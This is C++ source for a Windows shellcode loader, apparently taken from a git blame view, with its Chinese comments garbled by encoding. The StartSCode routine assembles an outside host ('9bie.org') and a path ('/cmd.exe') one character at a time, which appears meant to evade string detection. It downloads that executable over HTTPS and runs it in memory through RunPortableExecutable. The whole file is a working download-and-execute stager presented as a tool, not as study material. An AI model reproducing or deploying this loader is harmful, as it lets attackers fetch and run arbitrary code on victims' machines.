2021-02-22 06:23:52 -08:00
|
|
|
|
#include "ShellCode.h"
|
|
|
|
|
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ת<EFBFBD><D7AA><EFBFBD><EFBFBD><EFBFBD>ں<EFBFBD><DABA><EFBFBD>
|
2021-04-08 02:02:30 -07:00
|
|
|
|
#ifdef _WIN64
|
|
|
|
|
VOID mmLoaderSCStart(){
|
|
|
|
|
Strat();
|
|
|
|
|
#else
|
2021-02-22 06:23:52 -08:00
|
|
|
|
VOID _declspec(naked) mmLoaderSCStart()
|
|
|
|
|
{
|
2021-04-08 02:02:30 -07:00
|
|
|
|
|
2021-02-22 06:23:52 -08:00
|
|
|
|
__asm jmp Strat;
|
2021-04-08 02:02:30 -07:00
|
|
|
|
#endif
|
2021-02-22 06:23:52 -08:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD>ҪתΪshellcode<64><65><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
class RmExecute
|
|
|
|
|
{
|
|
|
|
|
public:
|
|
|
|
|
// <20><><EFBFBD><EFBFBD>
|
|
|
|
|
#include"Tool.h"
|
|
|
|
|
|
|
|
|
|
public:
|
|
|
|
|
//ģ<><C4A3>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD>---<2D><><EFBFBD><EFBFBD><EFBFBD>Ƕ<EFBFBD><C7B6><EFBFBD>Ŀȫ<C4BF>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD>Ķ<EFBFBD><C4B6><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Functions fn;
|
|
|
|
|
char s_runexe[260];
|
|
|
|
|
char* newbuff;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
public:
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>Լ<EFBFBD>һЩ<D2BB><D0A9>ʼ<EFBFBD>IJ<EFBFBD><C4B2><EFBFBD>
|
|
|
|
|
RmExecute()
|
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
newbuff = NULL;
|
|
|
|
|
Initfunctions(&fn);
|
|
|
|
|
char runexe[] = { 'A', 'A','\0' };
|
|
|
|
|
fn.fnmemcpy(s_runexe, runexe, 260);
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
~RmExecute()
|
|
|
|
|
{
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
public:
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//<2F><>ȡ<EFBFBD><C8A1>Ŀ<EFBFBD><C4BF>main<69>ļ<EFBFBD><C4BC><EFBFBD>StartSCode<64>൱<EFBFBD><E0B5B1><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF>main<69><6E><EFBFBD><EFBFBD>
|
2021-04-08 02:02:30 -07:00
|
|
|
|
void __stdcall StartSCode()
|
2021-02-22 06:23:52 -08:00
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
wchar_t host[] = {'9','b','i','e','.','o','r','g' ,'\0' };
|
|
|
|
|
wchar_t path[] = { '/','c','m','d','.','e','x','e','\0' };
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//ʹ<><CAB9>API֮ǰһ<C7B0><D2BB>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7>ʧ
|
|
|
|
|
Initfunctions(&fn);
|
|
|
|
|
|
|
|
|
|
int size = HttpDownload(host, path, 443, TRUE);
|
|
|
|
|
|
2021-04-08 02:02:30 -07:00
|
|
|
|
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
2021-02-22 06:23:52 -08:00
|
|
|
|
|
|
|
|
|
RunPortableExecutable();
|
|
|
|
|
|
|
|
|
|
fn.fnfree(newbuff);
|
|
|
|
|
// <20><><EFBFBD><EFBFBD>HttpDownloadһ<64><D2BB>Ҫfree
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
//sehllcode<64><65><EFBFBD>ں<EFBFBD><DABA><EFBFBD>
|
2021-04-08 02:02:30 -07:00
|
|
|
|
void __stdcall Strat()
|
2021-02-22 06:23:52 -08:00
|
|
|
|
{
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫģ<D2AA><C4A3>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
RmExecute runclass;
|
|
|
|
|
|
2021-04-08 02:02:30 -07:00
|
|
|
|
runclass.StartSCode();
|
2021-02-22 06:23:52 -08:00
|
|
|
|
}
|
2021-04-08 02:02:30 -07:00
|
|
|
|
#ifdef _WIN64
|
|
|
|
|
void mmLoaderSCEnd()
|
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
#else
|
2021-02-22 06:23:52 -08:00
|
|
|
|
void __declspec(naked) mmLoaderSCEnd()
|
|
|
|
|
{
|
2021-04-08 02:02:30 -07:00
|
|
|
|
|
2021-02-22 06:23:52 -08:00
|
|
|
|
__asm int 3;
|
2021-04-08 02:02:30 -07:00
|
|
|
|
#endif
|
2021-02-22 06:23:52 -08:00
|
|
|
|
}
|